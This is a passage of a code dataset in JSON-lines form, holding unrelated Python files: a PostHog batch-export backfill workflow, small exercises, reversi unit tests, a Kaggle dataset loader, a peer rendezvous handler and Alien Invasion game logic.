5.0,\n) -> None:\n \"\"\"Wait for a Temporal Schedule backfill in a date range to be finished.\n\n We can use the TemporalScheduledById and the TemporalScheduledStartTime to identify the Workflow 
executions\n runs that fall under this Temporal Schedule's backfill. However, there could be regularly scheduled runs returned\n by a query on just these two fields. So, we take the 'now' argument to provide a lower bound for the Workflow\n execution start time, assuming that backfill runs will have started recently after 'now' whereas regularly\n scheduled runs happened sometime in the past, before 'now'. This should hold true for historical backfills,\n but the heuristic fails for \"future backfills\", which should not be allowed.\n\n Raises:\n TemporalScheduleNotFoundError: If we detect the Temporal Schedule we are waiting on doesn't exist.\n \"\"\"\n if await check_temporal_schedule_exists(client, schedule_id) is False:\n raise TemporalScheduleNotFoundError(schedule_id)\n\n query = (\n f'TemporalScheduledById=\"{schedule_id}\" '\n f'AND TemporalScheduledStartTime >= \"{start_at.isoformat()}\" '\n f'AND TemporalScheduledStartTime <= \"{end_at.isoformat()}\" '\n f'AND StartTime >= \"{now.isoformat()}\"'\n )\n\n workflows = [workflow async for workflow in client.list_workflows(query=query)]\n\n if workflows and check_workflow_executions_not_running(workflows) is True:\n return\n\n done = False\n while not done:\n await asyncio.sleep(wait_delay)\n\n if await check_temporal_schedule_exists(client, schedule_id) is False:\n raise TemporalScheduleNotFoundError(schedule_id)\n\n workflows = [workflow async for workflow in client.list_workflows(query=query)]\n\n if not workflows:\n # Backfill hasn't started yet.\n continue\n\n if check_workflow_executions_not_running(workflows) is False:\n continue\n\n done = True\n\n\ndef check_workflow_executions_not_running(workflow_executions: list[temporalio.client.WorkflowExecution]) -> bool:\n \"\"\"Check if a list of Worflow Executions has any still running.\"\"\"\n return all(\n workflow_execution.status != temporalio.client.WorkflowExecutionStatus.RUNNING\n for workflow_execution in workflow_executions\n )\n\n\nasync def check_temporal_schedule_exists(client: temporalio.client.Client, schedule_id: str) -> bool:\n \"\"\"Check if Temporal Schedule exists by trying to describe it.\"\"\"\n handle = client.get_schedule_handle(schedule_id)\n\n try:\n await handle.describe()\n except temporalio.service.RPCError as e:\n if e.status == temporalio.service.RPCStatusCode.NOT_FOUND:\n return False\n else:\n raise\n return True\n\n\ndef backfill_range(\n start_at: dt.datetime, end_at: dt.datetime, step: dt.timedelta\n) -> typing.Generator[tuple[dt.datetime, dt.datetime], None, None]:\n \"\"\"Generate range of dates between start_at and end_at.\"\"\"\n current = start_at\n\n while current < end_at:\n current_end = current + step\n\n if current_end > end_at:\n # Do not yield a range that is less than step.\n # Same as built-in range.\n break\n\n yield current, current_end\n\n current = current_end\n\n\n@temporalio.workflow.defn(name=\"backfill-batch-export\")\nclass BackfillBatchExportWorkflow(PostHogWorkflow):\n \"\"\"A Temporal Workflow to manage a backfill of a batch export.\n\n Temporal Schedule backfills are limited in the number of batch periods we can buffer. This limit\n has been confirmed to be less than 1000. 
So, when triggering a backfill of more than 1000 batch\n periods (about a month for hourly batch exports), we need this Workflow to manage its progress.\n\n We also report on the progress by updating the BatchExportBackfill model.\n \"\"\"\n\n @staticmethod\n def parse_inputs(inputs: list[str]) -> BackfillBatchExportInputs:\n \"\"\"Parse inputs from the management command CLI.\"\"\"\n loaded = json.loads(inputs[0])\n return BackfillBatchExportInputs(**loaded)\n\n @temporalio.workflow.run\n async def run(self, inputs: BackfillBatchExportInputs) -> None:\n \"\"\"Workflow implementation to backfill a BatchExport.\"\"\"\n create_batch_export_backfill_inputs = CreateBatchExportBackfillInputs(\n team_id=inputs.team_id,\n batch_export_id=inputs.batch_export_id,\n start_at=inputs.start_at,\n end_at=inputs.end_at,\n status=\"Running\",\n )\n\n backfill_id = await temporalio.workflow.execute_activity(\n create_batch_export_backfill_model,\n create_batch_export_backfill_inputs,\n start_to_close_timeout=dt.timedelta(minutes=5),\n retry_policy=temporalio.common.RetryPolicy(\n initial_interval=dt.timedelta(seconds=10),\n maximum_interval=dt.timedelta(seconds=60),\n maximum_attempts=0,\n non_retryable_error_types=[\"NotNullViolation\", \"IntegrityError\"],\n ),\n )\n update_inputs = UpdateBatchExportBackfillStatusInputs(id=backfill_id, status=\"Completed\")\n\n frequency_seconds = await temporalio.workflow.execute_activity(\n get_schedule_frequency,\n inputs.batch_export_id,\n start_to_close_timeout=dt.timedelta(minutes=1),\n retry_policy=temporalio.common.RetryPolicy(maximum_attempts=0),\n )\n\n backfill_duration = dt.datetime.fromisoformat(inputs.end_at) - dt.datetime.fromisoformat(inputs.start_at)\n number_of_expected_runs = backfill_duration / dt.timedelta(seconds=frequency_seconds)\n\n backfill_schedule_inputs = BackfillScheduleInputs(\n schedule_id=inputs.batch_export_id,\n start_at=inputs.start_at,\n end_at=inputs.end_at,\n frequency_seconds=frequency_seconds,\n buffer_limit=inputs.buffer_limit,\n wait_delay=inputs.wait_delay,\n )\n try:\n await temporalio.workflow.execute_activity(\n backfill_schedule,\n backfill_schedule_inputs,\n retry_policy=temporalio.common.RetryPolicy(\n initial_interval=dt.timedelta(seconds=10),\n maximum_interval=dt.timedelta(seconds=60),\n non_retryable_error_types=[\"TemporalScheduleNotFoundError\"],\n ),\n # Temporal requires that we set a timeout.\n # Allocate 5 minutes per expected number of runs to backfill as a timeout.\n # The 5 minutes are just an assumption and we may tweak this in the future\n start_to_close_timeout=dt.timedelta(minutes=5 * number_of_expected_runs),\n heartbeat_timeout=dt.timedelta(minutes=2),\n )\n\n except temporalio.exceptions.ActivityError as e:\n if isinstance(e.cause, temporalio.exceptions.CancelledError):\n update_inputs.status = \"Cancelled\"\n else:\n update_inputs.status = \"Failed\"\n\n raise\n\n except Exception:\n update_inputs.status = \"Failed\"\n raise\n\n finally:\n await temporalio.workflow.execute_activity(\n update_batch_export_backfill_model_status,\n update_inputs,\n start_to_close_timeout=dt.timedelta(minutes=5),\n retry_policy=temporalio.common.RetryPolicy(\n initial_interval=dt.timedelta(seconds=10),\n maximum_interval=dt.timedelta(seconds=60),\n maximum_attempts=0,\n non_retryable_error_types=[\"NotNullViolation\", \"IntegrityError\"],\n ),\n 
)\n","repo_name":"PostHog/posthog","sub_path":"posthog/temporal/batch_exports/backfill_batch_export.py","file_name":"backfill_batch_export.py","file_ext":"py","file_size_in_byte":15180,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"}
{"seq_id":"2927210967","text":"from tkinter import *\r\nimport calendar\r\n\r\ntext = calendar.calendar(2022)\r\n\r\nroot=Tk()\r\nroot.geometry(\"530x700\")\r\nroot.title(\"CALENDAR\")\r\nlabel1=Label(root, text=\"CALENDAR\", bg=\"cyan\", font=(\"times\",28,\"bold\"))\r\nlabel1.grid(row=1, column=1)\r\nroot.config(background=\"cyan\")\r\nl1=Label(root, text=text,font=\"consoles 10 bold\")\r\nl1.grid(row=2, column=1, padx=20)\r\nroot.mainloop()","repo_name":"Anas275/Game","sub_path":"Calander.py","file_name":"Calander.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"33775934532","text":"# 5- in the previous dictionary add one more item for RCB.\n# you can choose any 3 opponents.\n\n\nIPL = {\n\"CSK\" :{\n    \"team_full_name\":\"Chennai Super Kings\",\n    \"captain\":\"Dhoni\",\n    \"players_match1\":[\"P1\",\"P2\",\"P3\",\"P4\",\"P5\",\"P6\",\"P7\",\"P8\",\"P9\",\"P10\",\"P11\"],\n    \"players_match2\":[\"P1\",\"P2\",\"P3\",\"P4\",\"P5\",\"P6\",\"P7\",\"P8\",\"P9\",\"P10\",\"P11\"],\n    \"opponent_team_name\":[\"MI\",\"RCB\",\"GT\"],\n    \"result\":[\"Won\",\"Loss\"] \n},\n\"RCB\":{\n    \"team_full_name\":\"Royal Challengers Bangalore\",\n    \"captain\":\"Virat\",\n    \"players_match1\":[\"P1\",\"P2\",\"P3\",\"P4\",\"P5\",\"P6\",\"P7\",\"P8\",\"P9\",\"P10\",\"P11\"],\n    \"players_match2\":[\"P1\",\"P2\",\"P3\",\"P4\",\"P5\",\"P6\",\"P7\",\"P8\",\"P9\",\"P10\",\"P11\"],\n    \"opponent_team_name\":[\"MI\",\"CSK\",\"GT\"],\n    \"result\":[\"Won\",\"Loss\"] \n}\n\n}","repo_name":"Nidhig631/Namaste-Python","sub_path":"Day3/ques_5.py","file_name":"ques_5.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"17182298270","text":"class Solution:\n    def dailyTemperatures(self, temperatures: List[int]) -> List[int]:\n        ans =[0]*len(temperatures)\n        stack = [0]\n        for i in range(1, len(temperatures)):\n            while stack and temperatures[stack[-1]]< temperatures[i]:\n                n=stack.pop()\n                ans[n] = i-n\n            stack.append(i)\n        return ans","repo_name":"addisumotora/competitive_programming","sub_path":"dialytemp.py","file_name":"dialytemp.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"69823137449","text":"\"\"\"Tests for google3.experimental.users.benjaminmarks.reversi .\"\"\"\n\nimport unittest\n\nfrom board import Board\nfrom board import Square\n\n\nclass BoardTest(unittest.TestCase):\n  new_4_board = [\n      [2, 2, 2, 2],\n      [2, 0, 1, 2],\n      [2, 1, 0, 2],\n      [2, 2, 2, 2]\n  ]\n  new_8_board = [\n      [2, 2, 2, 2, 2, 2, 2, 2],\n      [2, 2, 2, 2, 2, 2, 2, 2],\n      [2, 2, 2, 2, 2, 2, 2, 2],\n      [2, 2, 2, 0, 1, 2, 2, 2],\n      [2, 2, 2, 1, 0, 2, 2, 2],\n      [2, 2, 2, 2, 2, 2, 2, 2],\n      [2, 2, 2, 2, 2, 2, 2, 2],\n      [2, 2, 2, 2, 2, 2, 2, 2]\n  ]\n\n  def test_board_creation(self):\n    board = Board.makeboard(4)\n    if not board:\n      self.fail('Board not made')\n\n  def test_board_initial_setup_size4(self):\n    board = Board.makeboard(4)\n    self.assertEqual(board.board, self.new_4_board)\n    self.assertEqual(board.get_size(), 4)\n\n  def test_board_initial_setup_size8(self):\n    board = Board.makeboard(8)\n    
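The `dailyTemperatures` record above is the classic monotonic-stack solution: each index is pushed and popped at most once, so the whole pass is O(n). A self-contained version with a worked check (starting the loop at index 0 with an empty stack, which is equivalent to the record's `stack = [0]` seed):

```python
def daily_temperatures(temperatures: list[int]) -> list[int]:
    answer = [0] * len(temperatures)
    stack = []  # indices of days still waiting for a warmer temperature
    for i, t in enumerate(temperatures):
        # Pop every colder pending day: day `i` is its answer.
        while stack and temperatures[stack[-1]] < t:
            j = stack.pop()
            answer[j] = i - j
        stack.append(i)
    return answer

assert daily_temperatures([73, 74, 75, 71, 69, 72, 76, 73]) == [1, 1, 4, 2, 1, 1, 0, 0]
```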
self.assertEqual(board.board, self.new_8_board)\n\n def test_board_can_count_pieces(self):\n board = Board.makeboard(6)\n self.assertEqual(board.num_pieces(Square.white), 2)\n self.assertEqual(board.num_pieces(Square.black), 2)\n\n def test_board_valid_move(self):\n expected_board = [\n [2, 2, 2, 2],\n [2, 0, 0, 0],\n [2, 1, 0, 2],\n [2, 2, 2, 2]\n ]\n board = Board.makeboard(4)\n board.add_piece(1, 3, Square.white)\n self.assertEqual(board.board, expected_board)\n\n def test_board_count_moves(self):\n board = Board.makeboard(6)\n board.add_piece(1, 3, Square.white)\n self.assertEqual(board.get_num_moves(), 1)\n\n def test_board_illegal_move_out_of_range(self):\n board = Board.makeboard(4)\n board.add_piece(0, 6, Square.white)\n self.assertEqual(board.board, self.new_4_board)\n\n def test_board_illegal_move_no_points(self):\n board = Board.makeboard(8)\n board.add_piece(1, 1, Square.white)\n self.assertEqual(board.board, self.new_8_board)\n\n def test_board_illegal_move_wrong_team(self):\n board = Board.makeboard(4)\n board.add_piece(1, 0, Square.black)\n self.assertEqual(board.board, self.new_4_board)\n\n def test_board_game_over_white_win(self):\n board = Board.makeboard(4)\n moves = [[3, 1], [3, 2],\n [3, 3], [3, 0],\n [0, 2], [2, 3],\n [1, 3], [0, 3],\n [0, 1], [0, 0],\n [2, 0], [1, 0]]\n self.do_moves(moves, board)\n self.assertEqual(board.who_won(), Square.white)\n\n def test_board_game_over_black_win(self):\n board = Board.makeboard(4)\n moves = [[2, 0], [3, 2],\n [2, 3], [3, 0],\n [3, 1], [1, 0],\n [0, 2], [3, 3],\n [0, 1], [0, 0],\n [1, 3], [0, 3]]\n self.do_moves(moves, board)\n self.assertEqual(board.who_won(), Square.black)\n\n def test_board_game_over_tie(self):\n board = Board.makeboard(4)\n moves = [[1, 3], [2, 3],\n [3, 3], [0, 3],\n [0, 2], [0, 1],\n [0, 0], [3, 2],\n [2, 0], [3, 0],\n [3, 1], [1, 0]]\n self.do_moves(moves, board)\n self.assertEqual(board.who_won(), Square.blank)\n\n def test_board_game_over_black_eliminated(self):\n board = Board.makeboard(4)\n moves = [[1, 3], [2, 3],\n [3, 1], [2, 0],\n [3, 3], [0, 1],\n [3, 0]]\n self.do_moves(moves, board)\n board.add_piece(0, 0, Square.white)\n board.add_piece(0, 2, Square.black)\n board.add_piece(0, 3, Square.white)\n board.add_piece(1, 0, Square.white)\n self.assertEqual(board.who_won(), Square.white)\n self.assertEqual(board.num_pieces(Square.black), 0)\n self.assertEqual(board.get_squares_left(), 1)\n\n def test_board_player_no_move(self):\n moves = [[1, 3], [2, 3],\n [3, 3], [0, 3],\n [0, 1]]\n board = Board.makeboard(4)\n self.do_moves(moves, board)\n self.assertEqual(board.can_move(Square.black), False)\n self.assertEqual(board.get_turn(), Square.white)\n\n def test_board_game_over_no_moves(self):\n moves = [[1, 3], [2, 3],\n [3, 3], [0, 3],\n [0, 1]]\n board = Board.makeboard(4)\n self.do_moves(moves, board)\n board.add_piece(3, 0, Square.white)\n self.assertEqual(board.who_won(), Square.white)\n\n def test_remake_board(self):\n board = Board.makeboard(8)\n board2 = Board.makeboard(8)\n remadeboard = Board.from_json(board.to_json(), Square.white)\n self.assertEqual(remadeboard.board, board2.board)\n\n # Helper function, executes given moves on board\n # Note: assumes other player always has a valid move\n def do_moves(self, moves, board):\n cur_team = Square.white\n for move in moves:\n board.add_piece(move[0], move[1], cur_team)\n if cur_team == Square.white:\n cur_team = Square.black\n else:\n cur_team = Square.white\n\n\nif __name__ == '__main__':\n 
unittest.main()\n","repo_name":"Benjamin-Marks/reversi","sub_path":"main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":4819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19066672904","text":"from abc import ABC\nfrom pathlib import Path\n\nfrom dataset_format_benchmark.datasets import BaseDataset\n\n\nclass KaggleDataset(BaseDataset, ABC):\n BYTES_PER_VALUE = None\n DATASET_NAME = None\n IMAGE_DIR_NAME = None\n IMAGE_HEIGHT = None\n IMAGE_WIDTH = None\n RESULT_FILE_NAME = None\n\n def __init__(self, root: Path, transform=None, target_transform=None):\n super().__init__(root, transform, target_transform)\n\n if self.IMAGE_DIR_NAME:\n self.image_dir_path = Path(self.dataset_root_path, self.IMAGE_DIR_NAME)\n else:\n self.image_dir_path = None\n\n if self.RESULT_FILE_NAME:\n self.result_file_path = Path(self.dataset_root_path, self.RESULT_FILE_NAME)\n else:\n self.result_file_path = None\n\n self.transform = transform\n self.target_transform = target_transform\n self.x = None\n self.y = None\n\n def _download(self, force: bool = False):\n import kaggle\n\n kaggle.api.authenticate()\n\n if isinstance(self.DATASET_NAME, list):\n for dataset_name in self.DATASET_NAME:\n kaggle.api.dataset_download_files(dataset_name, path=self.dataset_root_path, quiet=False, unzip=True,\n force=force)\n else:\n kaggle.api.dataset_download_files(self.DATASET_NAME, path=self.dataset_root_path, quiet=False, unzip=True,\n force=force)\n","repo_name":"kamikaze/dataset-format-benchmark","sub_path":"src/dataset_format_benchmark/datasets/kaggle/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"4361992302","text":"# Time: O(n * k), k is the length of the common prefix\n# Space: O(1)\n\n\n# 编写一个函数来查找字符串数组中的最长公共前缀。\n# 如果不存在公共前缀,返回空字符串 \"\"\n# Example 1:\n# Input: [\"flower\",\"flow\",\"flight\"]\n# Output: \"fl\"\n\nclass Solution:\n # 执行用时为 60 ms 的范例\n def longestCommonPrefix_1(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n if len(strs) < 1:\n return \"\"\n\n max_str = strs[0]\n max_len = len(max_str)\n for item in strs:\n if len(item) > max_len:\n max_len = len(item)\n max_str = item\n for item in strs:\n index = 0\n j = 0\n while j != len(item) and j != len(max_str):\n if item[index] == max_str[index]:\n index += 1\n j += 1\n max_str = max_str[:index]\n\n return max_str\n # 执行用时为 44 ms 的范例\n def longestCommonPrefix_2(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n if len(strs) == 0:\n return ''\n\n if len(strs) == 1:\n return strs[0]\n\n # 只需要比较最大和最小的,\n # 只要a和b有共同前缀,其他中间的都有,只要a和b没有,其他的有也白瞎\n a = min(strs)\n b = max(strs)\n\n for i in range(len(a)):\n if a[i] != b[i]:\n return a[:i]\n return a\n","repo_name":"haitwang-cloud/leetCode_Python","sub_path":"longest-common-prefix.py","file_name":"longest-common-prefix.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"5999720828","text":"import uuid\nimport logging\nfrom tandem.rendezvous.models.connection import Connection\nfrom tandem.rendezvous.stores.session import SessionStore\nfrom tandem.shared.models.peer import Peer\nfrom tandem.shared.protocol.handlers.addressed import AddressedHandler\nfrom tandem.shared.protocol.messages.rendezvous import (\n RendezvousProtocolMessageType,\n 
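The second solution in the longest-common-prefix record above rests on a neat invariant: under lexicographic order, any prefix shared by `min(strs)` and `max(strs)` is shared by every string sorted between them, so comparing just the two extremes suffices. A compact restatement of that trick:

```python
def longest_common_prefix(strs: list[str]) -> str:
    if not strs:
        return ""
    a, b = min(strs), max(strs)  # lexicographic extremes
    for i in range(len(a)):
        if a[i] != b[i]:
            return a[:i]
    return a  # `a` is a prefix of `b`, hence of every string in between

assert longest_common_prefix(["flower", "flow", "flight"]) == "fl"
```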
RendezvousProtocolUtils,\n SetupParameters,\n Error,\n)\nfrom tandem.shared.utils.static_value import static_value as staticvalue\n\n\ndef parse_uuid(candidate):\n try:\n return uuid.UUID(candidate)\n except ValueError:\n return None\n\n\nclass AgentRendezvousProtocolHandler(AddressedHandler):\n @staticvalue\n def _protocol_message_utils(self):\n return RendezvousProtocolUtils\n\n @staticvalue\n def _protocol_message_handlers(self):\n return {\n RendezvousProtocolMessageType.ConnectRequest.value:\n self._handle_connect_request,\n }\n\n def __init__(self, gateway):\n self._gateway = gateway\n\n def _handle_connect_request(self, message, sender_address):\n # Validate request identifiers\n connection_id = parse_uuid(message.my_id)\n session_id = parse_uuid(message.session_id)\n if connection_id is None or session_id is None:\n logging.info(\n \"Rejecting ConnectRequest from {}:{} due to malformed\"\n \" connection and/or session id.\"\n .format(*sender_address),\n )\n self._send_error_message(sender_address, \"Invalid ids.\")\n return\n\n # Fetch or create the session\n session = SessionStore.get_instance().get_or_create_session(session_id)\n\n # Make sure the agent requesting to join is new or has the same\n # \"identity\" as an agent already in the session.\n initiator = Connection(Peer(\n id=connection_id,\n public_address=sender_address,\n private_address=message.private_address,\n ))\n existing_connection = session.get_connection(connection_id)\n if existing_connection is None:\n session.add_connection(initiator)\n elif not(initiator == existing_connection):\n # Reject the connection request for security reasons since the\n # client gets to choose their ID. The first agent to join a\n # session \"claims\" the ID. This is not foolproof, but it makes\n # it more difficult for someone to join an existing session as\n # someone else.\n logging.info(\n \"Rejecting ConnectRequest from {}:{} due to existing\"\n \" connection with the same id.\"\n .format(*sender_address),\n )\n self._send_error_message(sender_address, \"Invalid session.\")\n return\n\n logging.info(\n \"Connection {} is joining session {} requested by {}:{}\".format(\n str(connection_id),\n str(session_id),\n *sender_address,\n ),\n )\n\n for member_connection in session.get_connections():\n if not(member_connection == initiator):\n # Send initiator's details to the session member\n self._send_setup_parameters_message(\n session_id=session_id,\n recipient=member_connection,\n should_connect_to=initiator,\n initiate=False,\n )\n\n # Send the session member's details to the initiator\n self._send_setup_parameters_message(\n session_id=session_id,\n recipient=initiator,\n should_connect_to=member_connection,\n initiate=True,\n )\n\n def _send_setup_parameters_message(\n self,\n session_id,\n recipient,\n should_connect_to,\n initiate,\n ):\n io_data = self._gateway.generate_io_data(\n self._protocol_message_utils().serialize(SetupParameters(\n session_id=str(session_id),\n peer_id=str(should_connect_to.get_peer().get_id()),\n initiate=initiate,\n public=should_connect_to.get_peer().get_public_address(),\n private=should_connect_to.get_peer().get_private_address(),\n )),\n recipient.get_peer().get_public_address(),\n )\n self._gateway.write_io_data(io_data)\n\n def _send_error_message(self, address, message):\n io_data = self._gateway.generate_io_data(\n self._protocol_message_utils().serialize(Error(\n message=message,\n )),\n address,\n )\n 
self._gateway.write_io_data(io_data)\n","repo_name":"typeintandem/tandem","sub_path":"rendezvous/tandem/rendezvous/protocol/handlers/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","stars":697,"dataset":"github-code","pt":"53"} +{"seq_id":"2207528303","text":"import sys\n\nimport pygame\nfrom bullet import Bullet \nfrom alien import Alien \nfrom time import sleep\n\n\ndef check_keydown_events(event,ai_settings, screen, ship, bullets):\n\t\"\"\"响应按键\"\"\"\n\tif event.key == pygame.K_RIGHT:\n\t\tship.moving_right = True\n\telif event.key == pygame.K_LEFT:\n\t\tship.moving_left = True\n\telif event.key == pygame.K_SPACE:\n\t\tfire_bullet(ai_settings, screen, ship, bullets)\n\telif event.key == pygame.K_q:\n\t\tsys.exit()\n\n\t\t\ndef fire_bullet(ai_settings, screen,ship,bullets):\n\t\"\"\"如果没有到达限制,就发射一颗子弹\"\"\"\n\t#创建新子弹,并将其加入编组bullets中\n\tif len(bullets) < ai_settings.bullet_allowed:\n\t\tnew_bullet = Bullet(ai_settings, screen, ship)\n\t\tbullets.add(new_bullet)\n\n\t\t\ndef check_keyup_events(event, ship):\n\t\"\"\"响应松开\"\"\"\n\tif event.key == pygame.K_RIGHT:\n\t\tship.moving_right = False\n\telif event.key == pygame.K_LEFT:\n\t\tship.moving_left = False\n\n\t\t\ndef check_events(ai_settings, screen, ship, bullets):\n\t\"\"\"响应按键和鼠标事件\"\"\"\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tsys.exit()\n\t\t\n\t\telif event.type == pygame.KEYDOWN:\n\t\t\tcheck_keydown_events(event,ai_settings, screen, ship, bullets)\n\t\t\n\t\telif event.type == pygame.KEYUP:\n\t\t\tcheck_keyup_events(event, ship)\n\n\t\t\t\t\t\t\ndef update_screen(ai_settings, screen,stats, ship,aliens, bullets):\n\t\"\"\"\"更新屏幕上的图像,并切换到新屏幕\"\"\"\n\t\n\t#每次循环时都会重新绘制屏幕\n\tscreen.fill(ai_settings.bg_color)\n\t\n\t#在飞船和外星人后面重绘所有子弹\n\tfor bullet in bullets.sprites():\n\t\tbullet.draw_bullet()\n\t\n\tship.blitme()\n\taliens.draw(screen)\n\t\n\t#如果游戏处于非活动状态, 就绘制Play按钮\n\t#if not stats.game_active:\n\t\t#play_button.draw_button()\n\t\t\n\t\t\n\t#让最近绘制的屏幕可见\n\tpygame.display.flip()\n\n\ndef check_bullet_alien_collisions(ai_settings, screen, ship, aliens, bullets):\n\t\"\"\"相应子弹和外星人的碰撞\"\"\"\n\t#删除发生碰撞的子弹和外星人\n\tcollections = pygame.sprite.groupcollide(bullets, aliens, True, True)\n\t\n\tif len(aliens) == 0:\n\t\tbullets.empty()\n\t\tai_settings.increase_speed()\n\t\tcreat_fleet(ai_settings, screen, ship, aliens)\n\t\"\"\"(要模拟能够穿行到屏幕顶端的高能子弹 —— 消灭它��中的每个外星人,\n\t 可将第一个布尔实参设置为 False ,并让第二个布尔实参为 True 。\n\t 这样被击中的外星人将消失,但所有的子弹都始终有效,直到抵达屏幕顶端后消失。)\"\"\"\n\t \n\t \t\ndef update_bullets(ai_settings, screen, ship, aliens, bullets):\n\t\"\"\"更新子弹位置,并删除已经消失的子弹\"\"\"\n\t#更新子弹位置\n\tbullets.update()\n\t\n\t\n\t#删除已消失子弹位置\n\tfor bullet in bullets.copy():\n\t\tif bullet.rect.bottom <= 0:\n\t\t\tbullets.remove(bullet)\n\t#print(len(bullets))\n\t#检查是否有子弹击中了外星人\n\t#如果是这样,就删除相应的子弹和外星人\n\tcheck_bullet_alien_collisions(ai_settings, screen, ship, aliens, bullets)\n\t\n\t\ndef get_number_aliens_x(ai_settings, alien_width):\n\t\"\"\"并计算一行可以容纳多少个外星人\"\"\"\n\tavailable_space_x = ai_settings.screen_width -2*alien_width\n\tnumber_aliens_x = int(available_space_x /(2*alien_width))\n\treturn number_aliens_x\n\n\ndef get_number_rows(ai_settings, ship_height, alien_height):\n\t\"\"\"计算屏幕可以容纳多少个外星人\"\"\"\n\tavailable_space_y = (ai_settings.screen_height - (3*alien_height)-ship_height)\n\tnumbers_rows = int(available_space_y /(2*alien_height))\n\treturn numbers_rows\n\n\t\ndef creat_alien(ai_settings, screen, aliens, alien_number, 
row_number):\n\t\"\"\"创建一个外星人并将其加入当前行\"\"\"\n\talien = Alien(ai_settings, screen)\n\talien_width = alien.rect.width\n\talien.x = alien_width + 2*alien_width*alien_number\n\talien.rect.x = alien.x\n\talien.rect.y = alien.rect.height + 2*alien.rect.height*row_number\n\taliens.add(alien)\n\n\t\ndef creat_fleet(ai_settings, screen, ship, aliens):\n\t\"\"\"创建外星人群\"\"\"\n\t#创建一个外星人,并计算一行可以容纳多少个外星人\n\talien = Alien(ai_settings, screen)\n\tnumber_aliens_x = get_number_aliens_x(ai_settings, alien.rect.width)\n\tnumber_rows = get_number_rows(ai_settings, ship.rect.height,alien.rect.height)\n\t\n\t#创建第一行外星人\n\tfor row_number in range(number_rows):\n\t\tfor alien_number in range(number_aliens_x):\n\t\t\tcreat_alien(ai_settings, screen, aliens, alien_number, row_number)\n\n\ndef check_fleet_edges(ai_settings, aliens):\n\t\"\"\"有外星人到达边缘是采取相应措施\"\"\"\n\tfor alien in aliens.sprites():\n\t\tif alien.check_edges():\n\t\t\tchange_fleet_direction(ai_settings, aliens)\n\t\t\tbreak\n\n\ndef change_fleet_direction(ai_settings, aliens):\n\t\"\"\"将整群外星人下移,并改变他们的方向\"\"\"\n\tfor alien in aliens.sprites():\n\t\talien.rect.y += ai_settings.fleet_drop_speed\n\tai_settings.fleet_direction *= -1\n\n\ndef ship_hit(ai_settings, stats, screen, ship, aliens, bullets):\n\t\"\"\"相应被外星人撞到的飞船\"\"\"\n\tif stats.ships_left > 0:\n\t\t#将ship_left减1\n\t\tstats.ships_left -= 1\n\t\t\n\t\t#清空外星人列表和子弹列表\n\t\taliens.empty()\n\t\tbullets.empty()\n\t\t\n\t\t#创建一群新的外星人, 并将飞船放到屏幕低端中央\n\t\tcreat_fleet(ai_settings, screen, ship, aliens)\n\t\tship.center_ship()\n\t\t\n\t\t#暂停\n\t\tsleep(0.5)\n\t\n\telse:\n\t\tstats.game_active = False\n\t\t\n\n\ndef check_aliens_bottom(ai_settings, stats, screen, ship, aliens, bullets):\n\t\"\"\"检查是否有外星人到达了屏幕底端\"\"\"\n\tscreen_rect = screen.get_rect()\n\tfor alien in aliens.sprites():\n\t\tif alien.rect.bottom >= screen_rect.bottom:\n\t\t\t#像飞船被撞到一样处理\n\t\t\tship_hit(ai_settings, stats, screen, ship, aliens, bullets)\n\t\t\tbreak\n\t\t\t\n\t\t\t\t\t\t\ndef update_aliens(ai_settings,stats, screen, ship, aliens, bullets):\n\t\"\"\"检查是否有外星人位于屏幕边缘, 更新外星人群中所有外星人的位置\"\"\"\n\tcheck_fleet_edges(ai_settings,aliens)\n\taliens.update()\n\t\n\t#检测外星人和飞船之间的碰撞\n\tif pygame.sprite.spritecollideany(ship, aliens):\n\t\tship_hit(ai_settings, stats, screen, ship, aliens, bullets)\n\t\n\t#检查是否有外星人到达屏幕底端\n\tcheck_aliens_bottom(ai_settings, stats, screen, ship, aliens, bullets)\n\t\n","repo_name":"heartangle/python","sub_path":"alien_game/game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":6134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38705281583","text":"playlist = {\"title\": \"patagonia bus\",\n \"author\" : \"colt steele\",\n \"songs\": [\n {\"title\": \"song1\", \"artist\": [\"artist1\"], \"duration\": 2.5},\n {\"title\": \"song2\", \"artist\": [\"artist2\", \"dj cat\"], \"duration\": 5.25},\n {\"title\": \"nice song\", \"artist\": [\"various artist\"], \"duration\": 3.1}\n ]\n}\n\ntotal_length = 0\nfor song in playlist[\"songs\"]:\n total_length += song[\"duration\"]\nprint(total_length)\n","repo_name":"Lunchesque/udemy","sub_path":"fullpythontutorial/dictionaries/spotify_plalist_example.py","file_name":"spotify_plalist_example.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37645260117","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = 
